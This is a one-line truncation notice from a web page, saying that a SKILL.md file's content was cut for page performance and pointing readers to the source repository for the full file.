> Content truncated for page performance. Open the source repository for the full SKILL.md file.